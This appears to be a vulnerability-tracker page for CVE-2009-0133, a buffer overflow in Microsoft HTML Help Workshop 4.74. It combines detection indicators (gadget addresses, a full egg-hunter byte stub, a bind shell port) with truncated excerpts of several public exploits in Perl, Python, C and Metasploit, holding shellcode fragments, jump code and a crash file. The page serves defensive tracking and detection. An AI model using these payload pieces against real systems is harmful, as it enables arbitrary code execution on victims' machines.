CVE-2009-0133
published 2009-01-15CVE-2009-0133: Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long…
PriorityP259critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.05%
99.2th percentile
Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x5d\x38\x82\x7c (JMP ESP in ntdll.dll, used as EIP overwrite)
bytes↗
\x5d\x38\x82\x7c (JMP ESP, repeated at offsets 272-296)
bytes↗
\x93\x1f\x40\x00 (Call EDI in hhw.exe)
bytes↗
0x77E859BA (return address overwrite at overflow[280])
bytes↗
Egg hunter tag: \x69\x72\x61\x71\x69\x72\x61\x71 (iraqiraq)
bytes↗
Egg hunter stub: \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
- →Malicious .hhp files exploit the 'Index file' or 'Compiled file' field in the [OPTIONS] section with an oversized value (hundreds of bytes) to trigger a stack buffer overflow in HTML Help Workshop 4.74. ↗
- →Look for .hhp files where the 'Compiled file=' or 'Index file=' value in [OPTIONS] is abnormally long (>230 bytes), which is the overflow trigger pattern used across all known exploits. ↗
- →Detect NOP sled patterns (0x90 repeated) followed by shellcode within .hhp file field values, a common payload delivery pattern in these exploits. ↗
- →The Metasploit module targets this vulnerability by creating a specially crafted .hhp file; monitor for hhw.exe opening .hhp files from untrusted locations followed by unexpected child process spawning. ↗
- →The exploit at offset 280 overwrites EIP; a return address of 0x77E859BA or 0x7c82385d appearing in crash dumps of hhw.exe is indicative of exploitation attempts. ↗
- →Bind shell on port 13579 is spawned by one of the known shellcode payloads; detect unexpected listening on TCP/13579 after hhw.exe execution. ↗
- →Egg hunter tag 'iraq' (bytes 0x69 0x72 0x61 0x71) repeated twice as a marker within the payload; scan .hhp file content for this byte sequence. ↗
- ·The JMP ESP gadget address 0x7c82385d is specific to Windows XP SP2 ntdll.dll and will not be valid on other OS versions or patch levels. ↗
- ·The 'Call EDI' gadget at 0x00401f93 in hhw.exe is described as 'universal' by the exploit author but is tied to a specific build of hhw.exe version 4.74. ↗
- ·The return address 0x77E859BA used in exploit 1495 is specific to Windows XP SP2 Russian edition. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)
exploitdb·2010-09-25
CVE-2009-0133 Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)
Microsoft HTML Help Workshop 4.74 - '.hhp' Index Buffer Overflow (Metasploit) (3)
---
##
# $Id: hhw_hhp_indexfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'Encrypt3d.M!nd', 'loneferret', 'jduck' ],
'
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
exploitdb·2009-12-05
CVE-2009-0133 Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
---
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SKD Exploit on Win 7 and didn't work.I Think it's
# Shellhunter compatibility problem. so i wrote this and used egg hunting-
# method. Would take some time to execute the shellcode,but it will run ;-)
#
# Tested on : Windows xp sp3
# Windows 7 ultimate
#
hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
"\x6E\x74\x73\x20\x66\x69\x6C\x65"
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
"\x78\x20\x66\x69\x6C\x65\x3D")
crlf =("\x
Exploit-DB
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
exploitdb·2009-01-12
CVE-2009-0133 Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
---
#!/usr/bin/perl
# Microsoft HTML Workshop http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# -> http://abysssec.com
#
# Peace out,
# SkD.
my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
"\x6E\x74\x73\x20\x66\x69\x6C\x65".
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
"\x78\x20\x66\x69\x6C\x65\x3D";
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
"\x0A\x61\x2E\x68\x74\x6D";
my $crlf = "\x0d\x0a";
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
exploitdb·2006-02-14
CVE-2006-0564 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
---
/*
\ Windows HTML Help Workshop Index File Stack Overflow Exploit
/ by Darkeagle
\
/ [http://eagle.blacksecurity.org]
\
/ MS coders codes so secure code. Keep coding }:>
\
/ Original Advisory: http://eagle.blacksecurity.org/stuff/unl0ck/adv/55k700206.txt
\
/ Exploit tested in WinXP SP2 RUS.
\
*/
#include
#include
#include "stdafx.h"
char ep[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=XAKEP.chm\n"
"Index File=";
char pro[]=
"Display compile progress=No\n"
"Language=0x43f Êàçàõñêèé\n\n\n"
"[INFOTYPES]";
char shellcode[]=
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
exploitdb·2006-02-11
CVE-2009-0133 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
---
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The Buffer Overlfow in Compiled File in Options in a HHP file.
Bug found by:darkeagle
Exploit coded by:k3xji
Mail:[email protected]
Web: www.guvenliklab.com
Tested:Win XP SP2
*/
#include
#include
#include
#define BUFLEN 0xe6
char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";
char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";
char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";
char shellcode[]=
//Taken from ATmaCA's Execute Calc.exe shellcode.Thx.A bit lazy to call ExitProcess:P
"\x54\x50\x53\x50\x29\xc9\x83\xe9
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Denial of Service
exploitdb·2006-02-10
CVE-2006-0564 Microsoft HTML Help Workshop - '.hhp' Denial of Service
Microsoft HTML Help Workshop - '.hhp' Denial of Service
---
[OPTIONS]
Compatibility=1.1 or later
Compiled file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaUUUUr0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Display compile progress=No
Language=0x419 Ðóññêèé
[INFOTYPES]
# milw0rm.com [2006-02-10]
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
exploitdb·2006-02-06
CVE-2009-0133 Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
---
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)
-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here
-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)
-> special thx to:
duksie, dwarf & turb00 (you guys know why)
C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe
C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Wo
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
metasploit
CVE-2009-0133 HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.
No writeups or analysis indexed.
2009-01-15
Published